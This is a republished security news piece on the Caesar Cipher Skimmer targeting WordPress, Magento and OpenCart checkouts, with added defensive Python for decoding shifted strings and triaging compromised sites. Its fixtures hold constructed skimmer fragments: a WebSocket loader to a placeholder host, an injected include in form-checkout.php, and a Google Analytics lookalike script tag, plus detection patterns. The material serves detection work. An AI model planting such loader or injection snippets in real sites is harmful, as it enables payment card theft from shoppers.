New Credit Card Skimmer Targets WordPress, Magento and OpenCart

admin, 2024-06-27 19:51:11

Multiple content management system (CMS) platforms like WordPress, Magento, and OpenCart have been targeted by a new credit card web skimmer called Caesar Cipher Skimmer.

A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information.

According to Sucuri, the latest campaign entails making malicious modifications to the checkout PHP file associated with the WooCommerce plugin for WordPress ("form-checkout.php") to steal credit card details.

"For the past few months, the injections have been changed to look less suspicious than a long obfuscated script," security researcher Ben Martin said, noting the malware's attempt to masquerade as Google Analytics and Google Tag Manager.

Specifically, it utilizes the same substitution mechanism employed in Caesar cipher to encode the malicious piece of code into a garbled string and conceal the external domain that's used to host the payload.
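
What "the same substitution mechanism employed in Caesar cipher" amounts to in practice, and how an analyst undoes it, as an added example written for this page (it is not the skimmer's code and not from the Sucuri write-up): letters are rotated by a fixed offset while digits and punctuation pass through, so a shifted host name or loader still "looks like" a host name or script but matches no string signature. Because there are only 26 possible offsets, brute-forcing every shift and scoring the output for tokens a real loader contains recovers the plaintext immediately. The host `skimmer-cdn.example.com`, the loader snippet and the offsets 3 and 7 are constructed placeholders.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar_shift(text, shift):
    """Classic Caesar substitution: rotate A-Z and a-z by `shift` positions.
    Digits, dots, slashes and punctuation pass through unchanged, which is
    why a shifted host name still looks like a host name at a glance."""
    shift %= 26
    table = str.maketrans(
        LOWER + UPPER,
        LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift],
    )
    return text.translate(table)


# Substrings that a correctly decoded loader or host name tends to contain.
# Any shift that produces several of these is almost certainly the right one.
MARKERS = ("websocket", "function", "document", "location", "script",
           "wss://", "https://", ".com", ".net", ".org", ".io", ".ru")


def plausibility(text):
    low = text.lower()
    return sum(low.count(m) for m in MARKERS)


def recover(garbled):
    """Try all 26 shifts; return (shift the attacker used, decoded text)
    for the candidate with the highest plausibility score."""
    best = max(range(26), key=lambda k: plausibility(caesar_shift(garbled, -k)))
    return best, caesar_shift(garbled, -best)


# Constructed samples: placeholder host and loader, not artefacts from the report.
HIDDEN_HOST = "skimmer-cdn.example.com"
GARBLED_HOST = caesar_shift(HIDDEN_HOST, 3)      # "vnlpphu-fgq.hadpsoh.frp"

LOADER_SRC = ('var s = new WebSocket("wss://skimmer-cdn.example.com/");'
              ' s.onmessage = function (e) { /* run fetched stage */ };')
GARBLED_LOADER = caesar_shift(LOADER_SRC, 7)

if __name__ == "__main__":
    print("garbled host:", GARBLED_HOST)
    print("recovered   :", recover(GARBLED_HOST))
    print("recovered   :", recover(GARBLED_LOADER))
```

The marker list is deliberately short; for a real sample, add the tokens you expect in that site's legitimate tags (for example `googletagmanager`) so that a lookalike that decodes to a non-Google host stands out.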

It's presumed that all the websites had previously been compromised by other means in order to stage a PHP script, named "style.css" or "css.php", in an apparent effort to mimic a stylesheet and evade detection.


These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.

"The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site," Martin pointed out. "Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them."

Some versions of the script have programmer-readable explanations (aka comments) written in Russian, suggesting that the threat actors behind the operation are Russian-speaking.

The WooCommerce form-checkout.php file is not the only deployment method: the attackers have also been observed abusing the legitimate WPCode plugin to inject the skimmer into the website database.


On websites that use Magento, the JavaScript injections are performed on database tables such as core_config_data. It's currently not known how this is accomplished on OpenCart sites.
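
The staging and persistence locations described above (a PHP script named like a stylesheet, a modified form-checkout.php, script injected through a WPCode snippet, and JavaScript stored in Magento's core_config_data) translate into a few concrete triage checks. The script below is an added example for this page, not Sucuri's tooling: it verifies the checkout template against a pristine copy, flags `.css` files that contain a PHP open tag, and inspects database-stored markup for Google Analytics / Tag Manager lookalikes that load from a non-Google host, WebSocket loaders, and character-shift decoding routines. All file contents, database rows and the host `stats.example-cdn.net` are constructed; the placement of WPCode snippets in `wp_posts` with post_type `wpcode` is an assumption to verify on your own install.

```python
import hashlib
import re

# --- Constructed samples (placeholders, not artefacts from the Sucuri report) ---

# Stand-in for a clean copy of the WooCommerce checkout template, used as the
# integrity baseline; in practice take it from a fresh download of the plugin.
BASELINE = {
    "wp-content/plugins/woocommerce/templates/checkout/form-checkout.php":
        "<?php\ndefined('ABSPATH') || exit;\n"
        "do_action('woocommerce_before_checkout_form', $checkout);\n",
}

# What is on disk in the (constructed) incident.
ON_DISK = {
    "wp-content/plugins/woocommerce/templates/checkout/form-checkout.php":
        "<?php\ndefined('ABSPATH') || exit;\n"
        "include_once ABSPATH . 'wp-content/uploads/2024/05/style.css';\n"
        "do_action('woocommerce_before_checkout_form', $checkout);\n",
    "wp-content/uploads/2024/05/style.css":
        "<?php echo '<script src=\"//stats.example-cdn.net/gtm.js\"></script>';",
    "wp-content/themes/storefront/style.css":
        "/*\nTheme Name: Storefront\n*/\nbody { margin: 0; }\n",
}

# Rows pulled from the CMS database as (table, key, value). The wpcode row
# location is an assumption about how the WPCode plugin stores snippets.
DB_ROWS = [
    ("core_config_data", "design/head/includes",
     '<script async src="https://www.googletagmanager.com/gtag/js?id=G-TEST"></script>'),
    ("core_config_data", "design/footer/absolute_footer",
     '<!-- Google Analytics --><script src="//stats.example-cdn.net/analytics.js"></script>'),
    ("wp_posts (post_type=wpcode, assumed)", "Site tracking",
     '<script>var d=function(s){return s.replace(/[a-z]/g,function(c){'
     'return String.fromCharCode((c.charCodeAt(0)-97+23)%26+97);});};'
     'var w=new WebSocket("wss://"+d("vnlpphu-fgq.hadpsoh.frp")+"/");</script>'),
]

# Hosts that genuinely serve GA / GTM; anything that name-drops them but loads
# from elsewhere is treated as a lookalike.
GOOGLE_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)
GA_WORDS = re.compile(r"google\s*-?\s*analytics|googletagmanager|gtag\(", re.I)
# Heuristic for a substitution decoder: char codes shifted by a constant.
SHIFT_DECODER_RE = re.compile(r"charCodeAt\([^)]*\)\s*[+-]\s*\d")


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def modified_core_files(on_disk, baseline):
    """Paths whose on-disk content differs from the pristine copy."""
    return sorted(p for p, clean in baseline.items()
                  if p in on_disk and sha256(on_disk[p]) != sha256(clean))


def php_in_stylesheets(on_disk):
    """A .css file must never contain a PHP open tag."""
    return sorted(p for p, body in on_disk.items()
                  if p.lower().endswith(".css") and "<?php" in body)


def row_findings(value):
    """Reasons a database-stored snippet deserves a closer look."""
    findings = []
    foreign = [h for h in SRC_RE.findall(value) if h.lower() not in GOOGLE_HOSTS]
    if GA_WORDS.search(value) and foreign:
        findings.append("GA/GTM lookalike loading from " + ", ".join(foreign))
    if "WebSocket(" in value:
        findings.append("WebSocket loader in stored markup")
    if SHIFT_DECODER_RE.search(value):
        findings.append("character-shift decoding routine")
    return findings


def suspicious_rows(rows):
    return [(table, key, row_findings(value))
            for table, key, value in rows if row_findings(value)]


if __name__ == "__main__":
    print("modified templates :", modified_core_files(ON_DISK, BASELINE))
    print("PHP in .css files  :", php_in_stylesheets(ON_DISK))
    for table, key, why in suspicious_rows(DB_ROWS):
        print(f"{table} / {key}: {'; '.join(why)}")
```

Against a live site, replace the dictionaries with a walk of the document root and the output of `SELECT path, value FROM core_config_data` (Magento) or a query for the plugin's snippet rows (WordPress); the checks themselves do not change.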

Due to its prevalent use as a foundation for websites, WordPress and the larger plugin ecosystem have become a lucrative target for malicious actors, allowing them easy access to a vast attack surface.

It's imperative that site owners keep their CMS software and plugins up-to-date, enforce password hygiene, and periodically audit them for the presence of suspicious administrator accounts.

References

[1]https://thehackernews.com/2024/06/new-credit-card-skimmer-targets.html

Originally published on the WeChat public account 知机安全: New Credit Card Skimmer Targets WordPress, Magento and OpenCart

Republished by CN-SEC: https://cn-sec.com/archives/2891957.html